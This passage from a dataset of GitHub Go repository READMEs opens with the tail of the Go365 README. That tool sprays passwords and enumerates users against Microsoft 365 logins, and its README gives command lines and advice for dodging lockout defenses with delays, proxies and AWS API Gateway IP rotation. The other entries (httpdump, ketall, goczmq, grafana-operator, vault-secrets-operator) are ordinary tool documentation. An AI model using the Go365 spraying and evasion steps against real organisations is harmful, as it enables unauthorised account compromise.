-d pwnthisfakedomain.com -w 5\n ./Go365 -endpoint rst -up ./userpass_list.txt -delay 3600 -d pwnthisfakedomain.com -w 5 -o Go365output.txt\n ./Go365 -endpoint graph -u legituser -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5 -o Go365output.txt -proxy 127.0.0.1:1080\n ./Go365 -endpoint rst -u legituser -pl ./pass_list.txt -delay 1800 -d pwnthisfakedomain.com -w 5 -o Go365output.txt -proxyfile ./proxyfile.txt\n ./Go365 -endpoint graph -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5 -o Go365output.txt -url https://notrealgetyourown.execute-api.us-east-2.amazonaws.com/login\n\n You can even schedule out your entire password guessing campaign using the -pl and -delay flags :)\n ./Go365 -endpoint rst -ul ./user_list.txt -d pwnthisfakedomain.com -w 5 -o Go365output.txt -url https://notrealgetyourown.execute-api.us-east-2.amazonaws.com/login -proxyfile listofprox.txt -pl listofpasswords.txt -delay 7200\n\n *Protip: If you get a lot of \"Account locked out\" responses, then you might wanna proxy or use an AWS Gateway.\n```\n\n## Account Locked Out! (Domain Defenses)\n\n**protip:** _You probably aren't **actually** locking out accounts._\n\nAfter a number of queries against a target domain, results might start reporting that accounts are locked out.\n\nOnce this defense is triggered, **user enumeration becomes unreliable since requests for valid and invalid users will randomly report that their accounts have been locked out**.\n\n```\n...\n[-] User not found: test.user90@pwnthisfakedomain.com\n[-] User not found: test.user91@pwnthisfakedomain.com\n[-] Valid user, but invalid password: test.user92@pwnthisfakedomain.com\n[!] Account Locked Out: real.user1@pwnthisfakedomain.com\n[-] Valid user, but invalid password: test.user93@pwnthisfakedomain.com\n[!] Account Locked Out: valid.user94@pwnthisfakedomain.com\n[!] Account Locked Out: jane.smith@pwnthisfakedomain.com\n[-] Valid user, but invalid password: real.user95@pwnthisfakedomain.com\n[-] Valid user, but invalid password: fake.user96@pwnthisfakedomain.com\n[!] Account Locked Out: valid.smith@pwnthisfakedomain.com\n...\n```\n\nThis is a defensive mechanism triggered by the number of **valid** user queries against the target domain within a certain period of **time**. The number of attempts and the period of time will vary depending on the target domain since the thresholds can be customized by the target organization.\n\n### Countering Defenses\n\n#### Wait time\n\nThe defensive mechanism is **time** and **IP address** based. Go365 provides options to include a wait time between requests and proxy options to distribute the source of the requests. To circumvent the defensive mechanisms on your target domain, use a long wait time and multiple proxy servers.\n\nA wait time of AT LEAST 15 seconds is recommended. `-w 15`\n\n#### SOCKS5 Proxies\n\nIf you still get \"account locked out\" responses, start proxying your requests. Proxy options have only been tested on SSH SOCKS5 dynamic proxies (`ssh -D user@proxyserver`)\n\nCreate a bunch of SOCKS5 proxies on DO or AWS or Vultr or whatever and make a file that looks like this:\n\n```\n127.0.0.1:8081\n127.0.0.1:8082\n127.0.0.1:8083\n127.0.0.1:8084\n127.0.0.1:8085\n127.0.0.1:8086\n...\n```\n\nThe tool will randomly iterate through the provided proxy servers and wait for the specified amount of time between requests.\n\n`-w 15 -proxyfile ./proxies.txt`\n\n#### Amazon API Gateway\n\nAdditionally, an endpoint url may be specified so this tool can interface with Amazon API Gateway. Setup a gateway to point to the `https://login.microsoftonline.com/rst2.srf` endpoint, then set the -url parameter to the provided `Invoke URL`. Your IP should be rotated with each request.\n\n`-url https://justanexample.execute-api.us-east-2.amazonaws.com/login`", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hsiafan/httpdump", "link": "https://github.com/hsiafan/httpdump", "tags": ["capture", "pcap-analyzer", "http"], "stars": 532, "description": "Capture and parse http traffics", "lang": "Go", "repo_lang": "", "readme": "Parse and display http traffic from network device or pcap file. This is a go version of origin pcap-parser, thanks to gopacket project, this tool has simpler code base and is more efficient.\n\nFor original python implementation, [refer to httpcap on pypi](https://pypi.org/project/httpcap/).\n\nNote: This tool **can not parse HTTPS/HTTP2 traffics**.\n\n# Install & Requirement\nBuild httpdump requires libpcap-dev and cgo enabled.\n## libpcap\nfor ubuntu/debian:\n\n```sh\nsudo apt install libpcap-dev\n```\n\nfor centos/redhat/fedora:\n\n```sh\nsudo yum install libpcap-devel\n```\n\nfor osx:\n\nLibpcap and header files should be available in macOS already.\n\n## Install\n\n```sh\ngo get github.com/hsiafan/httpdump\n```\n\n\n# Usage\nhttpdump can read from pcap file, or capture data from network interfaces. Usage:\n\n```\nUsage: httpdump \n -curl\n \tOutput an equivalent curl command for each http request\n -device string\n \tCapture packet from network device. If is any, capture all interface traffics (default \"any\")\n -dump-body\n \tdump http request/response body to file\n -file string\n \tRead from pcap file. If not set, will capture data from network device by default\n -force\n \tForce print unknown content-type http body even if it seems not to be text content\n -host string\n \tFilter by request host, using wildcard match(*, ?)\n -idle duration\n \tIdle time to remove connection if no package received (default 4m0s)\n -ip string\n \tFilter by ip, if either source or target ip is matched, the packet will be processed\n -level string\n \tOutput level, options are: url(only url) | header(http headers) | all(headers, and textuary http body) (default \"header\")\n -output string\n \tWrite result to file [output] instead of stdout\n -port uint\n \tFilter by port, if either source or target port is matched, the packet will be processed.\n -pretty\n \tTry to format and prettify json content\n -status string\n \tFilter by response status code. Can use range. eg: 200, 200-300 or 200:300-400\n -uri string\n \tFilter by request url path, using wildcard match(*, ?)\n\n```\n\n## Samples\nA simple capture:\n\n```\n$ httpdump\n192.168.110.48:56585 -----> 101.201.170.152:80\nGET / HTTP/1.1\nHost: geek.csdn.net\nConnection: keep-alive\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\nDNT: 1\nAccept-Encoding: gzip, deflate, sdch\nAccept-Language: zh-CN,zh;q=0.8\nCookie: uuid_tt_dd=-7445280944848876972_20160309; _JQCMT_ifcookie=1; _JQCMT_browser=8cc6c51a0610de98f19cf86af0855a3e; lzstat_uv=24444940273412920400|2839507@3117794@3311294\n\n\n101.201.170.152:80 <----- 192.168.110.48:56585\nHTTP/1.1 200 OK\nServer: openresty\nDate: Tue, 31 May 2016 02:40:14 GMT\nContent-Type: text/html; charset=utf-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nKeep-Alive: timeout=20\nVary: Accept-Encoding\nVary: Accept-Encoding\nContent-Encoding: gzip\n\n{body size: 15482 , set level arg to all to display body content}\n```\n\nMore:\n\n```sh\n# parse pcap file\nsudo tcpdump -wa.pcap tcp\nhttpdump -file a.pcap\n\n# capture specified device:\nhttpdump -device eth0\n\n# filter by ip and/or port\nhttpdump -port 80 # filter by port\nhttpdump -ip 101.201.170.152 # filter by ip\nhttpdump -ip 101.201.170.152 -port 80 # filter by ip and port\n```\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "corneliusweig/ketall", "link": "https://github.com/corneliusweig/ketall", "tags": ["kubectl-plugins", "kubectl", "kubectl-plugin", "get", "resources", "resource-list", "k8s", "overview"], "stars": 532, "description": "Like `kubectl get all`, but get really all resources", "lang": "Go", "repo_lang": "", "readme": "# ketall\n[![Build Status](https://travis-ci.com/corneliusweig/ketall.svg?branch=master)](https://travis-ci.com/corneliusweig/ketall)\n[![Go Report Card](https://goreportcard.com/badge/corneliusweig/ketall)](https://goreportcard.com/report/corneliusweig/ketall)\n[![LICENSE](https://img.shields.io/github/license/corneliusweig/ketall.svg)](https://github.com/corneliusweig/ketall/blob/master/LICENSE)\n[![Releases](https://img.shields.io/github/release-pre/corneliusweig/ketall.svg)](https://github.com/corneliusweig/ketall/releases)\n\n\nKubectl plugin to show really all kubernetes resources\n\n## Intro\nFor a complete overview of all resources in a kubernetes cluster, `kubectl get all --all-namespaces` is not enough, because it simply does not show everything.\nThis helper lists _really_ all resources the cluster has to offer.\n\n## Demo\n![ketall demo](doc/demo.gif \"ketall demo\")\n\n## Examples\nGet all resources...\n- ... excluding events (this is hardly ever useful)\n ```bash\n ketall\n ```\n\n- ... _including_ events\n ```bash\n ketall --exclude=\n ```\n\n- ... created in the last minute\n ```bash\n ketall --since 1m\n ```\n This flag understands typical human-readable durations such as `1m` or `1y1d1h1m1s`.\n\n- ... in the default namespace\n ```bash\n ketall --namespace=default\n ```\n\n- ... at cluster level\n ```bash\n ketall --only-scope=cluster\n ```\n\n- ... using list of cached server resources\n ```bash\n ketall --use-cache\n ```\n Note that this may fail to show __really__ everything, if the http cache is stale.\n\n- ... and combine with common `kubectl` options\n ```bash\n KUBECONFIG=otherconfig ketall -o name --context some --namespace kube-system --selector run=skaffold\n ```\n\nAlso see [Usage](doc/USAGE.md).\n\n## Installation\nThere are several ways to install `ketall`. The recommended installation method is via `krew`.\n\n### Via krew\nKrew is a `kubectl` plugin manager. If you have not yet installed `krew`, get it at\n[https://github.com/kubernetes-sigs/krew](https://github.com/kubernetes-sigs/krew).\nThen installation is as simple as\n```bash\nkubectl krew install get-all\n```\nThe plugin will be available as `kubectl get-all`, see [doc/USAGE](doc/USAGE.md) for further details.\n\n### Binaries\nWhen using the binaries for installation, also have a look at [doc/USAGE](doc/USAGE.md).\n\n#### Linux\n```bash\ncurl -Lo ketall.gz https://github.com/corneliusweig/ketall/releases/download/v1.3.8/ketall-amd64-linux.tar.gz && \\\n gunzip ketall.gz && chmod +x ketall && mv ketall $GOPATH/bin/\n```\n\n#### OSX\n```bash\ncurl -Lo ketall.gz https://github.com/corneliusweig/ketall/releases/download/v1.3.8/ketall-amd64-darwin.tar.gz && \\\n gunzip ketall.gz && chmod +x ketall && mv ketall $GOPATH/bin/\n```\n\n#### Windows\n[https://github.com/corneliusweig/ketall/releases/download/v1.3.8/ketall-amd64-windows.zip](https://github.com/corneliusweig/ketall/releases/download/v1.3.8/ketall-amd64-windows.zip)\n\n### From source\n\n#### Build on host\n\nRequirements:\n - go 1.16 or newer\n - GNU make\n - git\n\nCompiling:\n```bash\nexport PLATFORMS=$(go env GOOS)\nmake all # binaries will be placed in out/\n```\n\n#### Build in docker\nRequirements:\n - docker\n\nCompiling:\n```bash\nmkdir ketall && chdir ketall\ncurl -Lo Dockerfile https://raw.githubusercontent.com/corneliusweig/ketall/master/Dockerfile\ndocker build . -t ketall-builder\ndocker run --rm -v $PWD:/go/bin/ --env PLATFORMS=$(go env GOOS) ketall-builder\ndocker rmi ketall-builder\n```\nBinaries will be placed in the current directory.\n\n## Future\n- additional arguments could be used to filter the result set\n\n### Credits\nIdea by @ahmetb https://twitter.com/ahmetb/status/1095374856156196864\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zeromq/goczmq", "link": "https://github.com/zeromq/goczmq", "tags": [], "stars": 532, "description": "goczmq is a golang wrapper for CZMQ.", "lang": "Go", "repo_lang": "", "readme": "# goczmq [![Build Status](https://travis-ci.org/zeromq/goczmq.svg?branch=master)](https://travis-ci.org/zeromq/goczmq) [![Doc Status](https://godoc.org/github.com/zeromq/goczmq?status.png)](https://godoc.org/github.com/zeromq/goczmq)\n\n## Introduction\nA golang interface to the [CZMQ v4.2](http://czmq.zeromq.org) API.\n\n## Install\n### Dependencies\n* [libsodium](https://github.com/jedisct1/libsodium)\n* [libzmq](https://github.com/zeromq/libzmq)\n* [czmq](https://github.com/zeromq/czmq)\n\n### For CZMQ master\n```\ngo get github.com/zeromq/goczmq\n```\n#### A Note on Build Tags\nThe CZMQ library includes experimental classes that are not built by default, but can be built\nby passing `--enable-drafts` to configure. Support for these draft classes are being added\nto goczmq. To build these features against a CZMQ that has been compiled with `--enable-drafts`,\nuse `go build -tags draft`.\n\n### For CMZQ = 4.2\n```\ngo get gopkg.in/zeromq/goczmq.v4\n```\n**Note**: [CZMQ 4.2](https://github.com/zeromq/czmq/releases) is has not been released yet.\n\n### For CZMQ Before 4.0\n```\ngo get gopkg.in/zeromq/goczmq.v1\n```\n## Usage\n### Direct CZMQ Sock API\n#### Example\n```go\npackage main\n\nimport (\n\t\"log\"\n\n\t\"github.com/zeromq/goczmq\"\n)\n\nfunc main() {\n\t// Create a router socket and bind it to port 5555.\n\trouter, err := goczmq.NewRouter(\"tcp://*:5555\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer router.Destroy()\n\n\tlog.Println(\"router created and bound\")\n\n\t// Create a dealer socket and connect it to the router.\n\tdealer, err := goczmq.NewDealer(\"tcp://127.0.0.1:5555\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer dealer.Destroy()\n\n\tlog.Println(\"dealer created and connected\")\n\n\t// Send a 'Hello' message from the dealer to the router.\n\t// Here we send it as a frame ([]byte), with a FlagNone\n\t// flag to indicate there are no more frames following.\n\terr = dealer.SendFrame([]byte(\"Hello\"), goczmq.FlagNone)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Println(\"dealer sent 'Hello'\")\n\n\t// Receive the message. Here we call RecvMessage, which\n\t// will return the message as a slice of frames ([][]byte).\n\t// Since this is a router socket that support async\n\t// request / reply, the first frame of the message will\n\t// be the routing frame.\n\trequest, err := router.RecvMessage()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"router received '%s' from '%v'\", request[1], request[0])\n\n\t// Send a reply. First we send the routing frame, which\n\t// lets the dealer know which client to send the message.\n\t// The FlagMore flag tells the router there will be more\n\t// frames in this message.\n\terr = router.SendFrame(request[0], goczmq.FlagMore)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"router sent 'World'\")\n\n\t// Next send the reply. The FlagNone flag tells the router\n\t// that this is the last frame of the message.\n\terr = router.SendFrame([]byte(\"World\"), goczmq.FlagNone)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Receive the reply.\n\treply, err := dealer.RecvMessage()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"dealer received '%s'\", string(reply[0]))\n}\n```\n#### Output\n```\n2015/05/26 21:52:52 router created and bound\n2015/05/26 21:52:52 dealer created and connected\n2015/05/26 21:52:52 dealer sent 'Hello'\n2015/05/26 21:52:52 router received 'Hello' from '[0 103 84 189 175]'\n2015/05/26 21:52:52 router sent 'World'\n2015/05/26 21:52:52 dealer received 'World'\n```\n### io.ReadWriter support\n#### Example\n```go\npackage main\n\nimport (\n\t\"log\"\n\n\t\"github.com/zeromq/goczmq\"\n)\n\nfunc main() {\n\t// Create a router socket and bind it to port 5555.\n\trouter, err := goczmq.NewRouter(\"tcp://*:5555\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer router.Destroy()\n\n\tlog.Println(\"router created and bound\")\n\n\t// Create a dealer socket and connect it to the router.\n\tdealer, err := goczmq.NewDealer(\"tcp://127.0.0.1:5555\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer dealer.Destroy()\n\n\tlog.Println(\"dealer created and connected\")\n\n\t// Send a 'Hello' message from the dealer to the router,\n\t// using the io.Write interface\n\tn, err := dealer.Write([]byte(\"Hello\"))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"dealer sent %d byte message 'Hello'\\n\", n)\n\n\t// Make a byte slice and pass it to the router\n\t// Read interface. When using the ReadWriter\n\t// interface with a router socket, the router\n\t// caches the routing frames internally in a\n\t// FIFO and uses them transparently when\n\t// sending replies.\n\tbuf := make([]byte, 16386)\n\n\tn, err = router.Read(buf)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"router received '%s'\\n\", buf[:n])\n\n\t// Send a reply.\n\tn, err = router.Write([]byte(\"World\"))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"router sent %d byte message 'World'\\n\", n)\n\n\t// Receive the reply, reusing the previous buffer.\n\tn, err = dealer.Read(buf)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Printf(\"dealer received '%s'\", string(buf[:n]))\n}\n```\n#### Output\n```\n2015/05/26 21:54:10 router created and bound\n2015/05/26 21:54:10 dealer created and connected\n2015/05/26 21:54:10 dealer sent 5 byte message 'Hello'\n2015/05/26 21:54:10 router received 'Hello'\n2015/05/26 21:54:10 router sent 5 byte message 'World'\n2015/05/26 21:54:10 dealer received 'World'\n```\n### Thread safe channel interface\n#### Example\n```go\npackage main\n\nimport (\n\t\"log\"\n\n\t\"github.com/zeromq/goczmq\"\n)\n\nfunc main() {\n\t// Create a router channeler and bind it to port 5555.\n\t// A channeler provides a thread safe channel interface\n\t// to a *Sock\n\trouter := goczmq.NewRouterChanneler(\"tcp://*:5555\")\n\tdefer router.Destroy()\n\n\tlog.Println(\"router created and bound\")\n\n\t// Create a dealer channeler and connect it to the router.\n\tdealer := goczmq.NewDealerChanneler(\"tcp://127.0.0.1:5555\")\n\tdefer dealer.Destroy()\n\n\tlog.Println(\"dealer created and connected\")\n\n\t// Send a 'Hello' message from the dealer to the router.\n\tdealer.SendChan <- [][]byte{[]byte(\"Hello\")}\n\tlog.Println(\"dealer sent 'Hello'\")\n\n\t// Receve the message as a [][]byte. Since this is\n\t// a router, the first frame of the message wil\n\t// be the routing frame.\n\trequest := <-router.RecvChan\n\tlog.Printf(\"router received '%s' from '%v'\", request[1], request[0])\n\n\t// Send a reply. First we send the routing frame, which\n\t// lets the dealer know which client to send the message.\n\trouter.SendChan <- [][]byte{request[0], []byte(\"World\")}\n\tlog.Printf(\"router sent 'World'\")\n\n\t// Receive the reply.\n\treply := <-dealer.RecvChan\n\tlog.Printf(\"dealer received '%s'\", string(reply[0]))\n}\n```\n#### Output\n```\n2015/05/26 21:56:43 router created and bound\n2015/05/26 21:56:43 dealer created and connected\n2015/05/26 21:56:43 dealer sent 'Hello'\n2015/05/26 21:56:43 received 'Hello' from '[0 12 109 153 35]'\n2015/05/26 21:56:43 router sent 'World'\n2015/05/26 21:56:43 dealer received 'World'\n```\n## GoDoc\n[godoc](https://godoc.org/github.com/zeromq/goczmq)\n\n## See Also\n* [Peter Kleiweg's](https://github.com/pebbe) [zmq4](https://github.com/pebbe/zmq4) bindings\n\n## License\nThis project uses the MPL v2 license, see LICENSE\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "grafana-operator/grafana-operator", "link": "https://github.com/grafana-operator/grafana-operator", "tags": ["grafana-operator", "kubernetes", "operator", "grafana", "k8s", "golang", "go", "observability", "monitoring", "openshift", "community", "open-source", "hacktober", "kubernetes-operator", "openshift-v4"], "stars": 532, "description": "An operator for Grafana that installs and manages Grafana instances, Dashboards and Datasources through Kubernetes/OpenShift CRs", "lang": "Go", "repo_lang": "", "readme": "# Grafana Operator\n\nAn operator to provision and manage Grafana Instances, Dashboards, Datasources and notification channels. Based on the [Operator-SDK](https://sdk.operatorframework.io/)\n\n## Companies and teams that trust and use the Grafana operator\n\n| Company | Logo | Company | Logo\n| :--- | :----: | :--- | :----: |\n| [Red Hat](https://www.redhat.com)| | [Integreatly](https://www.redhat.com/en/products/integration)| |\n [Continental](https://www.continental.com/)| | [Handelsbanken](\"https://www.handelsbanken.se/en/\")||\n| [Xenit](https://xenit.se/contact/)|| [Torqata](https://torqata.com)| |\n|[Operate-first](https://www.operate-first.cloud/)| | [iFood](https://www.ifood.com.br)| |\n\n***If you find this operator useful in your product/deployment, feel free to send a pull request to add your company/team to be displayed here!***\n\n## Grafana Operator on the Kubernetes community Slack\n\nWe have set up a channel dedicated to this operator on the Kubernetes community Slack, this is an easier way to address\nmore immediate issues and facilitate discussion around development/bugs etc. as well as providing support for questions\nabout the operator.\n\n1: Join the Kubernetes Slack (if you have not done so already) [Kubernetes Slack](https://slack.k8s.io/).\n\n2: You will receive an email with an invitation link, follow that link and enter your desired username and password for the workspace(it might be easier if you use your Github username for our channel).\n\n3: Once registered and able to see the Kubernetes community Slack workspace and channels follow this link to the [grafana-operator channel](https://kubernetes.slack.com/messages/grafana-operator/ ).\n\nAlternatively:\nIf you're already a member of that workspace then just follow this link to the [grafana-operator channel](https://kubernetes.slack.com/messages/grafana-operator/)\nor search for \"grafana-operator\" in the browse channels option.\n\n![image](https://user-images.githubusercontent.com/35736504/90978105-0b195300-e543-11ea-86ee-1825da0e3b75.png)\n\n## Current status\n\nAll releases of the operator can be found on [Operator Hub](https://operatorhub.io/operator/grafana-operator).\n\n***Sometimes a release may take a few hours (in rare cases, days) to land on Operatorhub, please be patient, it's out of our control.***\n\n### Supported Versions\n\n#### v3.x\n\n***This version has known vulnerabilities present, rooted in the version of the operator-sdk that was used, please upgrade to v4(operator-sdk v1.3.0) to mitigate the risk***\n\nThis version of the operator will be deprecated in the near future, we recommend new users to install v4 and existing users to upgrade as soon as possible using the [upgrade guide](./documentation/upgrade.md).\n\nWe won't be accepting any new features for v3, the only releases made under this version will be either bug-fixes or security patches.\n\nThe operator-sdk is an exception to the security patch rule, it cannot be updated without introducing breaking changes, hence the recommendation to upgrade to v4, which mitigates these CVEs.\n\nThe documentation for this version can be found here: [https://github.com/grafana-operator/grafana-operator/tree/v3/documentation](https://github.com/grafana-operator/grafana-operator/tree/v3/documentation).\n\n#### v4.x (master)\n\nThis is the current main branch of the project, all future development will take place here, any new features and improvements should be submitted against this branch.\n\nPlease use the following link to access documentation at any given release of the operator:\n\n```txt\nhttps://github.com/grafana-operator/grafana-operator/tree//documentation\n```\n\n## Summary of benefits\n\nWhy decide to go with the Grafana-operator over a standard standalone Grafana deployment for your monitoring stack?\n\nIf [the benefits of using an operator over standalone products as outlined by the people that created them](https://operatorframework.io/) and our current high-profile users aren't enough to convince you, here's some more:\n\n* The ability to configure and manage your entire Grafana with the use Kubernetes resources such as CRDs, configMaps, Secrets etc.\n* Automation of:\n * Ingresses.\n * Grafana product versions.\n * Grafana dashboard plugins.\n * Grafana datasources.\n * Grafana notification channel provisioning.\n * Oauth proxy.\n * many others!\n* Efficient dashboard management through jsonnet, plugins, organizations and folder assignment, which can all be done through `.yamls`!\n* Both Kubernetes and OpenShift supported out of the box.\n* Multi-Arch builds and container images.\n* Operatorhub/OLM support (Allows you to install the operator with a few clicks).\n\nAnd the things on our roadmap:\n\n* Multi-Namespace and Multi-Instance support, allowing the operator to manage not only your Grafana instance, but also any other grafana instance on the cluster, eg. for public facing customer instance.\n\n## Operator flags\n\nThe operator supports the following flags on startup.\nSee [the documentation](./documentation/deploy_grafana.md) for a full list.\nFlags can be passed as `args` to the container.\n\n## Supported Custom Resources\n\nThe following Grafana resources are supported:\n\n* Grafana\n* GrafanaDashboard\n* GrafanaDatasource\n* GrafanaNotificationChannel\n\nall custom resources use the api group `integreatly.org` and version `v1alpha1`.\nTo get an overview of the available grafana-operator CRD see api.md.\n\n### Grafanas\n\nRepresents a Grafana instance. See [the documentation](./documentation/deploy_grafana.md) for a description of properties supported in the spec.\n\n### Dashboards\n\nRepresents a Grafana dashboard and allows specifying required plugins. See [the documentation](./documentation/dashboards.md) for a description of properties supported in the spec.\n\n### Datasources\n\nRepresents a Grafana datasource. See [the documentation](./documentation/datasources.md) for a description of properties supported in the spec.\n\n### Notifiers\n\nRepresents a Grafana notifier. See [the documentation](./documentation/notifiers.md) for a description of properties supported in the spec.\n\n## Development and Local Deployment\n\n### Using the Makefile\n\nIf you want to develop/build/test the operator, here are some instructions how to set up your dev-environment: [follow me](./documentation/develop.md)\n\n## Debug\n\nWe have documented a few steps to help you debug the [grafana-operator](documentation/debug.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ricoberger/vault-secrets-operator", "link": "https://github.com/ricoberger/vault-secrets-operator", "tags": ["kubernetes", "vault", "secret", "secrets", "crd", "operator-sdk", "helm-chart", "kubernetes-secrets", "gitops"], "stars": 532, "description": "Create Kubernetes secrets from Vault for a secure GitOps based workflow.", "lang": "Go", "repo_lang": "", "readme": "
\n \n

\n\n Create Kubernetes secrets from Vault for a secure GitOps based workflow.\n\n \n
\n\nThe **Vault Secrets Operator** creates Kubernetes secrets from Vault. The idea behind the Vault Secrets Operator is to manage secrets in Kubernetes cluster using a secure GitOps based workflow. For more information about a secure GitOps based workflow I recommend the article [\"Managing Secrets in Kubernetes\"](https://www.weave.works/blog/managing-secrets-in-kubernetes) from [Weaveworks](https://www.weave.works). With the help of the Vault Secrets Operator you can commit your secrets to your git repository using a custom resource. If you apply these secrets to your Kubernetes cluster the Operator will lookup the real secret in Vault and creates the corresponding Kubernetes secret. If you are using something like [Sealed Secrets](http://github.com/bitnami-labs/sealed-secrets) for this workflow the Vault Secrets Operator can be used as replacement for this.\n\n## Installation\n\nThe Vault Secrets Operator can be installed via Helm. A list of all configurable values can be found [here](./charts/README.md). The chart assumes a vault server running at `http://vault:8200`, but can be overidden by specifying `--set vault.address=https://vault.example.com`\n\n```sh\nhelm repo add ricoberger https://ricoberger.github.io/helm-charts\nhelm repo update\n\nhelm upgrade --install vault-secrets-operator ricoberger/vault-secrets-operator\n```\n\n### Prepare Vault\n\nThe Vault Secrets Operator supports the **KV Secrets Engine - Version 1** and **KV Secrets Engine - Version 2**. To create a new secret engine under a path named `kvv1` and `kvv2`, you can run the following command:\n\n```sh\nvault secrets enable -path=kvv1 -version=1 kv\nvault secrets enable -path=kvv2 -version=2 kv\n```\n\nAfter you have enabled the secret engine, create a new policy for the Vault Secrets Operator. The operator only needs read access to the paths you want to use for your secrets. To create a new policy with the name `vault-secrets-operator` and read access to the `kvv1` and `kvv2` path, you can run the following command:\n\n```sh\ncat < **Note:** This option is only available for the kubernetes auth method and all roles must be added to the auth method before they are used by the operator.\n\n### Using Vault Namespaces\n\n[Vault Namespaces](https://www.vaultproject.io/docs/enterprise/namespaces) is a set of features within Vault Enterprise that allows Vault environments to support Secure Multi-tenancy (or SMT) within a single Vault infrastructure.\n\nThe Vault Namespace, which should be used for the authentication of the operator against Vault can be specified via the `VAULT_NAMESPACE` environment variable. In the Helm chart this value can be provided as follows:\n\n```yaml\nenvironmentVars:\n - name: VAULT_NAMESPACE\n value: \"my/root/ns\"\n```\n\nThe operator also supports nested Namespaces. When the `VAULT_NAMESPACE` is set, it is also possible to specify a namespace via the `vaultNamespace` field in the VaultSecret CR:\n\n```yaml\napiVersion: ricoberger.de/v1alpha1\nkind: VaultSecret\nmetadata:\n name: kvv1-example-vaultsecret\nspec:\n vaultNamespace: team1\n path: kvv1/example-vaultsecret\n type: Opaque\n```\n\nThe Vault Namespace, which is used to get the secret in the above example will be `my/root/ns/team1`.\n\n### Propagating labels\n\nThe operator will propagate all labels found on the `VaultSecret` to the actual secret. So if a given label is needed on the resulting secret it can be added like in the following example:\n\n```yaml\napiVersion: ricoberger.de/v1alpha1\nkind: VaultSecret\nmetadata:\n name: example-vaultsecret\n labels:\n my-custom-label: my-custom-label-value\nspec:\n path: path/to/example-vaultsecret\n type: Opaque\n```\n\nThis would result in the following secret:\n\n```yaml\napiVersion: v1\ndata:\n ...\nkind: Secret\nmetadata:\n labels:\n created-by: vault-secrets-operator\n my-custom-label: my-custom-label-value\n name: example-vaultsecret\ntype: Opaque\n```\n\n## Development\n\nAfter modifying the `*_types.go` file always run the following command to update the generated code for that resource type:\n\n```sh\nmake generate\n```\n\nThe above makefile target will invoke the [controller-gen](https://sigs.k8s.io/controller-tools) utility to update the `api/v1alpha1/zz_generated.deepcopy.go` file to ensure our API's Go type definitons implement the `runtime.Object` interface that all Kind types must implement.\n\nOnce the API is defined with spec/status fields and CRD validation markers, the CRD manifests can be generated and updated with the following command:\n\n```sh\nmake manifests\n```\n\nThis makefile target will invoke controller-gen to generate the CRD manifests at `config/crd/bases/ricoberger.de_vaultsecrets.yaml`.\n\n### Locally\n\nSpecify the Vault address, a token to access Vault and the TTL (in seconds) for the token:\n\n```sh\nexport VAULT_ADDRESS=\nexport VAULT_AUTH_METHOD=token\nexport VAULT_TOKEN=\nexport VAULT_TOKEN_LEASE_DURATION=86400\nexport VAULT_RECONCILIATION_TIME=180\n```\n\nDeploy the CRD and run the operator locally with the default Kubernetes config file present at `$HOME/.kube/config`:\n\n```sh\nmake install run\n```\n\n### Minikube\n\nReuse Minikube's built-in Docker daemon:\n\n```sh\neval $(minikube docker-env)\n```\n\nBuild the Docker image for the operator:\n\n```sh\nmake docker-build IMG=ricoberger/vault-secrets-operator:dev\n```\n\nRun the following to deploy the operator. This will also install the RBAC manifests from `config/rbac`.\n\n```sh\nmake deploy IMG=ricoberger/vault-secrets-operator:dev\n```\n\nDeploy the Helm chart:\n\n```sh\nhelm upgrade --install vault-secrets-operator ./charts/vault-secrets-operator --namespace=vault-secrets-operator --set vault.address=\"$VAULT_ADDRESS\" --set image.repository=\"ricoberger/vault-secrets-operator\" --set image.tag=\"dev\"\n```\n\nFor an example using [kind](https://kind.sigs.k8s.io) you can take a look at the `hack/setup-kind.sh` file.\n\n## Links\n\n* [Managing Secrets in Kubernetes](https://www.weave.works/blog/managing-secrets-in-kubernetes)\n* [Operator SDK](https://github.com/operator-framework/operator-sdk)\n* [Vault](https://www.vaultproject.io)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "commitdev/zero", "link": "https://github.com/commitdev/zero", "tags": ["infrastructure", "technical-founders", "startup"], "stars": 531, "description": "Allow startup developers to ship to production on day 1", "lang": "Go", "repo_lang": "", "readme": "[![Tests](https://circleci.com/gh/commitdev/zero.svg?style=shield)](https://app.circleci.com/pipelines/github/commitdev/zero)\n[![Go Report 